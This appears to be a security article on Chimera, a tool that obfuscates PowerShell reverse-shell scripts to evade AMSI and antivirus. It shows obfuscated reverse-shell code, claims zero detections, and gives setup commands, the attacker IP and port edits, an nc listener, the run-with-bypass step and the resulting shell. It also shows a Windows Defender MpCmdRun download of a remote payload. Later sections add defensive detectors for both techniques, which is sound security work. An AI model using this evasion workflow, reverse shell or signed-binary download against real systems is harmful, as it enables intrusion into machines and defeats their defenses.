PowerShell script obfuscation to bypass AMSI/AV

Category: Security articles

https://github.com/tokyoneon/Chimera

Below is a fragment of Invoke-PowerShellTcp.ps1:

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)


After processing with Chimera:

# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.
 
  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

The VirusTotal report shows 0 detections.


Installation on Kali

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help


The shells/ directory contains several Nishang scripts and a few generic ones. All of them have been tested.

Before using the scripts, change the hard-coded IP address (192.168.56.101) to the address of your Kali machine.

/opt/chimera$ sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1

The default port in all scripts is 4444. If needed, change it with sed in the same way.

/opt/chimera$ sed -i 's/4444/<YOUR-DESIRED-PORT>/g' shells/*.ps1

-f: input file.

-o: output file.

-g: omit several Nishang-specific signatures from the script.

-v: replace variable names.

-t: replace data types.

-j: replace function names.

-i: insert arbitrary comments on every line.

-c: replace comments with arbitrary data.

-h: convert IP addresses to hexadecimal format.

-s: replace various strings.

-b: backtick strings where possible.

-e: check the obfuscated file after the process completes.
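The Chimera output shown earlier and the option list above describe the same handful of transformations: long random variable names (-v), random-cased type literals such as [bYte[]] and [teXt.enCoDInG] (-t), method names rebuilt from string-concatenated variables (-j), and a long comment inserted on every line (-i). Each of those is a trait a defender can score without signatures. The script below is an added example written for this page, not code from Chimera or from the original author; it scans a PowerShell script body for those four traits and treats two or more firing as a likely-obfuscated file. The sample inputs are constructed: the obfuscated lines are copied from the Chimera output above with the inserted comments shortened, and the clean lines are the un-obfuscated fragment from the start of the page. The thresholds are assumptions to tune against your own script corpus.

```python
import re
import statistics

# Constructed sample input: code lines copied from the Chimera output shown
# above, with the inserted Star Wars comments shortened to keep the block short.
OBFUSCATED_SAMPLE = r'''
# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station's equator.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke's boyhood friend Biggs, in ship-to-ship combat.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe)
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
'''

# Constructed contrast input: the un-obfuscated fragment of the same script.
CLEAN_SAMPLE = r'''
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username)
$stream.Write($sendbytes,0,$sendbytes.Length)
'''

# A member invoked through an expandable string built from variables,
# e.g. $obj."$a$b$c"(  -- the -j replacement for $obj.GetStream(
STRING_MEMBER_CALL = re.compile(r'\."\$[A-Za-z_]\w*(?:\$[A-Za-z_]\w*)*"\s*\(')
VARIABLE = re.compile(r'\$([A-Za-z_]\w*)')
TYPE_LITERAL = re.compile(r'\[([A-Za-z][\w.]*)')


def obfuscation_features(script: str) -> dict:
    """Count the Chimera-style traits present in a PowerShell script body."""
    lines = [l.strip() for l in script.splitlines() if l.strip()]
    comments = [l for l in lines if l.startswith('#')]
    code = [l for l in lines if not l.startswith('#')]
    names = [n for l in code for n in VARIABLE.findall(l)]
    # Type accelerators are normally lowercase or PascalCase; a word that starts
    # lowercase but has capitals inside it ([bYte], [teXt.enCoDInG]) is neither.
    odd_case = [
        part for l in code for t in TYPE_LITERAL.findall(l)
        for part in t.split('.') if re.match(r'[a-z]+[A-Z]', part)
    ]
    return {
        'comment_ratio': len(comments) / len(lines) if lines else 0.0,
        'avg_comment_len': statistics.mean(len(c) for c in comments) if comments else 0.0,
        'string_member_calls': sum(len(STRING_MEMBER_CALL.findall(l)) for l in code),
        'median_var_len': statistics.median(len(n) for n in names) if names else 0,
        'odd_case_types': len(odd_case),
    }


def is_likely_obfuscated(script: str) -> bool:
    """Two or more independent traits firing is treated as a hit (assumed thresholds)."""
    f = obfuscation_features(script)
    hits = [
        f['comment_ratio'] >= 0.4 and f['avg_comment_len'] >= 60,
        f['string_member_calls'] >= 1,
        f['median_var_len'] >= 20,
        f['odd_case_types'] >= 1,
    ]
    return sum(hits) >= 2


if __name__ == '__main__':
    for label, sample in (('chimera output', OBFUSCATED_SAMPLE), ('clean fragment', CLEAN_SAMPLE)):
        print(label, obfuscation_features(sample), '->', is_likely_obfuscated(sample))
```

The point of scoring several weak traits rather than one is that a single trait can be switched off by an option (-c replaces the comments, for instance) while the renamed variables and string-built member calls remain; the same features are what AMSI-era detection logic tends to key on once string signatures stop matching.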

Example: nc reverse shell

nc -v -l -p 4444

Transfer the obfuscated script to the target and run it:

PS> powershell.exe -ep bypass C:\path\to\chimera.ps1

A shell comes back:

nc -v -l -p 4444

listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725
Windows PowerShell running as user  on
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\target>

Further usage notes

https://github.com/tokyoneon/Chimera/blob/master/USAGE.md


A tip

Downloading files with Windows Defender

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\users\test\desktop\1.c
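Because MpCmdRun.exe is a signed Microsoft binary, the -DownloadFile action above is a living-off-the-land download that file-reputation controls will not stop; the useful control is process-creation telemetry. The detector below is an added example written for this page, not code from the original author or from Microsoft: it parses constructed process-creation events in a simplified field=value form (not real Sysmon or EDR output), keeps only MpCmdRun.exe invocations that carry -DownloadFile, and rates them by whether the -url host is inside an assumed allowlist. The allowlist suffixes and the event format are assumptions; the second event mirrors the command above, and the Microsoft download URL in the fourth is a constructed contrast value.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events in a simplified field=value form (not
# real Sysmon or EDR output). Event 2 mirrors the MpCmdRun command above;
# event 4 uses a constructed Microsoft download URL for contrast.
SAMPLE_EVENTS = [
    'ts=2020-09-01T10:00:00Z user=CORP\\svc_backup image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c dir"',
    'ts=2020-09-01T10:01:12Z user=DESKTOP\\test image="C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe" cmdline="MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c"',
    'ts=2020-09-01T10:02:30Z user="NT AUTHORITY\\SYSTEM" image="C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe" cmdline="MpCmdRun.exe -SignatureUpdate"',
    'ts=2020-09-01T10:03:05Z user="NT AUTHORITY\\SYSTEM" image="C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe" cmdline="MpCmdRun.exe -DownloadFile -url https://download.microsoft.com/example.cab -path C:\\Temp\\example.cab"',
]

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
DOWNLOAD_URL = re.compile(r'-DownloadFile\b.*?-url\s+(\S+)', re.IGNORECASE)
DEST_PATH = re.compile(r'-path\s+(\S+)', re.IGNORECASE)

# Assumed allowlist of host suffixes Defender is expected to fetch from. This is
# a placeholder for the reader's own environment, not a Microsoft-documented list.
TRUSTED_HOST_SUFFIXES = ('.microsoft.com', '.windowsupdate.com')


def parse_event(line: str) -> dict:
    """Split one field=value line into a dict; quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in FIELD.findall(line)}


def detect_defender_download(events) -> list:
    """Return one finding per MpCmdRun.exe -DownloadFile invocation.

    Severity is 'high' when the URL host is outside the allowlist: a trusted
    Defender binary writing arbitrary remote content to disk is the pattern
    the tip above relies on.
    """
    findings = []
    for line in events:
        ev = parse_event(line)
        exe = ev.get('image', '').replace('/', '\\').rsplit('\\', 1)[-1].lower()
        if exe != 'mpcmdrun.exe':
            continue
        cmdline = ev.get('cmdline', '')
        url_match = DOWNLOAD_URL.search(cmdline)
        if not url_match:
            continue  # other MpCmdRun actions (scans, signature updates) are routine
        url = url_match.group(1)
        host = (urlparse(url).hostname or '').lower()
        dest = DEST_PATH.search(cmdline)
        findings.append({
            'ts': ev.get('ts'),
            'user': ev.get('user'),
            'url': url,
            'host': host,
            'dest': dest.group(1) if dest else None,
            'severity': 'low' if host.endswith(TRUSTED_HOST_SUFFIXES) else 'high',
        })
    return findings


if __name__ == '__main__':
    for finding in detect_defender_download(SAMPLE_EVENTS):
        print(finding)
```

Matching on the image basename rather than the full path matters here: the Platform\<version> directory changes with every Defender platform update, so a rule pinned to the path shown above would go stale after the next update.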


